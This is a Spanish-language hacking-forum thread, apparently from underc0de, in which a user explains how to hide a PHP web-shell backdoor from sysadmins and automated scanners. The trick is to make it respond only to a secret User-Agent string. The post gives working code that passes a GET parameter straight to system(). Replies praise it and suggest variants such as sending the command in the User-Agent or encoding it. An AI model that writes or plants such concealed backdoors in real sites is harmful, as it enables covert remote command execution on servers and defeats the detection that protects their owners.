Como todos sabemos, esconder un backdoor a veces no es un trabajo sencillo, ya que, sin contar de que el sysadmin sea inteligente, hay scripts automatizados que se encargan de buscar este tipo de backdoors.
Así que, un método para evitar esto, es jugar con el User-Agent de nuestro navegador.
Con un código bastante simple, podemos proteger nuestro backdoor de visitas indeseadas:
<?php
if ($_SERVER['HTTP_USER_AGENT'] == "blackdrake")
{
@system($_GET['cmd']);
}
?>
De este modo, con una visita normal, no podremos ejecutar los comandos:
(http://i.imgur.com/LsuV2WY.png)
En cambio, modificando el User-Agent por
blackdrake, si que podremos:
(http://i.imgur.com/dULaMvA.png)
(http://i.imgur.com/UbDCJnD.png)
Algo muy sencillo pero que a algunos le vendrá bastante bien.
Un saludo.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Y pasar el mismísimo comando en el User-Agent? :P
Para eso habría que modificar constantemente el UA. Lo más cómodo es hacerlo de esta forma, supongo.
No había visto este aporte. Gracias
@blackdrake (https://underc0de.org/foro/index.php?action=profile;u=24972)!
Saludos!
WhiZ
buena, hace rato que queria probar si se puede encodear el contenido para variar ;D , buen aporte!